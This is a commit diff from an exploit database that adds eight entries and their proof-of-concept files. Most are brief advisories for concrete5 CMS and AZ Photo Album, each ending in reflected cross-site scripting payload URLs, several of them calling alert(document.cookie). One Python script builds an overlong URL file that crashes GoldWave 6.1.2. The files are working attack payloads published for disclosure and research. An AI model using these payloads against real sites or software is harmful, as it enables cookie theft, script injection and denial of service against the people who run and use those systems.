DB: 2015-06-15
8 new exploits
This commit is contained in:
parent
36b3c3268d
commit
3d125ca19a
9 changed files with 134 additions and 0 deletions
|
@ -33636,8 +33636,16 @@ id,file,description,date,author,platform,type,port
|
|||
37264,platforms/php/webapps/37264.txt,"WordPress Encrypted Contact Form Plugin 1.0.4 - CSRF Vulnerability",2015-06-10,"Nitin Venkatesh",php,webapps,80
|
||||
37265,platforms/linux/local/37265.txt,"OSSEC 2.7 <= 2.8.1 - Local Root Escalation",2015-06-11,"Andrew Widdersheim",linux,local,0
|
||||
37267,platforms/windows/dos/37267.py,"foobar2000 1.3.8 (.m3u) Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
|
||||
37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
|
||||
37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,"John Page",php,webapps,80
|
||||
37271,platforms/multiple/webapps/37271.txt,"Opsview <= 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80
|
||||
37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,0
|
||||
37274,platforms/php/webapps/37274.txt,"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal",2015-06-12,"Larry W. Cashdollar",php,webapps,80
|
||||
37275,platforms/php/webapps/37275.txt,"WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload",2015-06-12,"Larry W. Cashdollar",php,webapps,80
|
||||
37277,platforms/php/webapps/37277.txt,"concrete5 index.php/tools/required/files/search_dialog ocID Parameter XSS",2012-05-20,AkaStep,php,webapps,0
|
||||
37278,platforms/php/webapps/37278.txt,"concrete5 index.php/tools/required/files/customize_search_columns searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
|
||||
37279,platforms/php/webapps/37279.txt,"concrete5 index.php/tools/required/files/search_results searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
|
||||
37280,platforms/php/webapps/37280.txt,"concrete5 index.php/tools/required/sitemap_search_selector Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
|
||||
37281,platforms/php/webapps/37281.txt,"concrete5 index.php/tools/required/files/import Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
|
||||
37282,platforms/php/webapps/37282.txt,"concrete5 index.php/tools/required/files/bulk_properties searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
|
||||
37283,platforms/php/webapps/37283.txt,"AZ Photo Album Cross Site Scripting and Arbitrary File Upload Vulnerabilities",2012-05-20,"Eyup CELIK",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
15
platforms/php/webapps/37277.txt
Executable file
15
platforms/php/webapps/37277.txt
Executable file
|
@ -0,0 +1,15 @@
|
|||
source: http://www.securityfocus.com/bid/53640/info
|
||||
|
||||
Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
|
||||
|
||||
1. Multiple cross-site scripting vulnerabilities
|
||||
|
||||
2. An arbitrary-file-upload vulnerability
|
||||
|
||||
3. A denial-of-service vulnerability
|
||||
|
||||
An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Concrete CMS versions 5.5 and 5.5.21 are vulnerable.
|
||||
|
||||
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_dialog?ocID="><script>alert(1);</script>&search=1
|
15
platforms/php/webapps/37278.txt
Executable file
15
platforms/php/webapps/37278.txt
Executable file
|
@ -0,0 +1,15 @@
|
|||
source: http://www.securityfocus.com/bid/53640/info
|
||||
|
||||
Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
|
||||
|
||||
1. Multiple cross-site scripting vulnerabilities
|
||||
|
||||
2. An arbitrary-file-upload vulnerability
|
||||
|
||||
3. A denial-of-service vulnerability
|
||||
|
||||
An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Concrete CMS versions 5.5 and 5.5.21 are vulnerable.
|
||||
|
||||
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/customize_search_columns?searchInstance="><script>alert(document.cookie);</script>
|
15
platforms/php/webapps/37279.txt
Executable file
15
platforms/php/webapps/37279.txt
Executable file
|
@ -0,0 +1,15 @@
|
|||
source: http://www.securityfocus.com/bid/53640/info
|
||||
|
||||
Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
|
||||
|
||||
1. Multiple cross-site scripting vulnerabilities
|
||||
|
||||
2. An arbitrary-file-upload vulnerability
|
||||
|
||||
3. A denial-of-service vulnerability
|
||||
|
||||
An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Concrete CMS versions 5.5 and 5.5.21 are vulnerable.
|
||||
|
||||
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/search_results?submit_search=123&ocID=123&searchType=&searchInstance=&searchInstance=&ccm_order_by=fvDateAdded&ccm_order_dir=asc&searchType=123 &searchInstance="><script>alert(1);</script>
|
15
platforms/php/webapps/37280.txt
Executable file
15
platforms/php/webapps/37280.txt
Executable file
|
@ -0,0 +1,15 @@
|
|||
source: http://www.securityfocus.com/bid/53640/info
|
||||
|
||||
Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
|
||||
|
||||
1. Multiple cross-site scripting vulnerabilities
|
||||
|
||||
2. An arbitrary-file-upload vulnerability
|
||||
|
||||
3. A denial-of-service vulnerability
|
||||
|
||||
An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Concrete CMS versions 5.5 and 5.5.21 are vulnerable.
|
||||
|
||||
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/sitemap_search_selector?select_mode=move_copy_delete&cID="><script>alert(1);</script>
|
17
platforms/php/webapps/37281.txt
Executable file
17
platforms/php/webapps/37281.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
source: http://www.securityfocus.com/bid/53640/info
|
||||
|
||||
Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
|
||||
|
||||
1. Multiple cross-site scripting vulnerabilities
|
||||
|
||||
2. An arbitrary-file-upload vulnerability
|
||||
|
||||
3. A denial-of-service vulnerability
|
||||
|
||||
An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Concrete CMS versions 5.5 and 5.5.21 are vulnerable.
|
||||
|
||||
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/import?ocID="><script>alert(document.cookie);</script>&searchInstance=file1337335625
|
||||
|
||||
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/import?ocID=13&searchInstance="><script>alert(document.cookie);</script>
|
16
platforms/php/webapps/37282.txt
Executable file
16
platforms/php/webapps/37282.txt
Executable file
|
@ -0,0 +1,16 @@
|
|||
source: http://www.securityfocus.com/bid/53640/info
|
||||
|
||||
Concrete CMS is prone to following vulnerabilities because it fails to properly handle user-supplied input.
|
||||
|
||||
1. Multiple cross-site scripting vulnerabilities
|
||||
|
||||
2. An arbitrary-file-upload vulnerability
|
||||
|
||||
3. A denial-of-service vulnerability
|
||||
|
||||
An attacker may leverage these issues to cause denial-of-service conditions or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
|
||||
|
||||
Concrete CMS versions 5.5 and 5.5.21 are vulnerable.
|
||||
|
||||
http://www.example.com/learn/concrete/concrete5.5.2.1/index.php/tools/required/files/bulk_properties/?&fID[]=17&uploaded=true&searchInstance="><script>alert(document.cookie);</script>
|
||||
&fid=VALID_ID_OF_IAMGE
|
9
platforms/php/webapps/37283.txt
Executable file
9
platforms/php/webapps/37283.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/53641/info
|
||||
|
||||
The AZ Photo Album is prone to a cross-site-scripting and an arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
Attackers can exploit these issues to steal cookie information, execute arbitrary client side script code in the context of browser, upload and execute arbitrary files in the context of the webserver, and launch other attacks.
|
||||
|
||||
http://www.example.com/demo/php-photo-album-script/index.php/%F6%22%20onmouseover=document.write%28%22google.com%22%29%20
|
||||
|
||||
http://www.example.com/demo/php-photo-album-script/index.php/?gazpart=suggest
|
24
platforms/windows/dos/37268.py
Executable file
24
platforms/windows/dos/37268.py
Executable file
|
@ -0,0 +1,24 @@
|
|||
#!/usr/bin/python
|
||||
# Exploit Title: GoldWave 6.1.2 (URL) Local Crash Exploit
|
||||
# Date: 12-06-2015
|
||||
# Exploit Author: 0neb1n
|
||||
# Vendor Homepage: http://www.goldwave.com/
|
||||
# Software Link: http://goldwave.com/downloads/InstallGoldWave612.exe
|
||||
# Version: 6.1.2
|
||||
# Tested on: Windows 8.1 Home KR
|
||||
# Step 1 : Make poc.txt and copy "http://AAAAAAAA..."
|
||||
# Step 2 : run GoldWave 6.1.2 -> File -> Open URl -> Paste "http://AAAAAA..."
|
||||
# step 3 : Boom!!
|
||||
|
||||
file = "poc.txt"
|
||||
|
||||
data = 'http://' + '\x41' * 200000
|
||||
|
||||
fd = open(file, 'w')
|
||||
fd.write(data)
|
||||
fd.close()
|
||||
|
||||
print ""
|
||||
print "[*] File successfully created !!"
|
||||
print "[*] Author : 0neb1n"
|
||||
print "[*] Mail : barcodecrow(at)gmail(dot)com"
|
Loading…
Add table
Reference in a new issue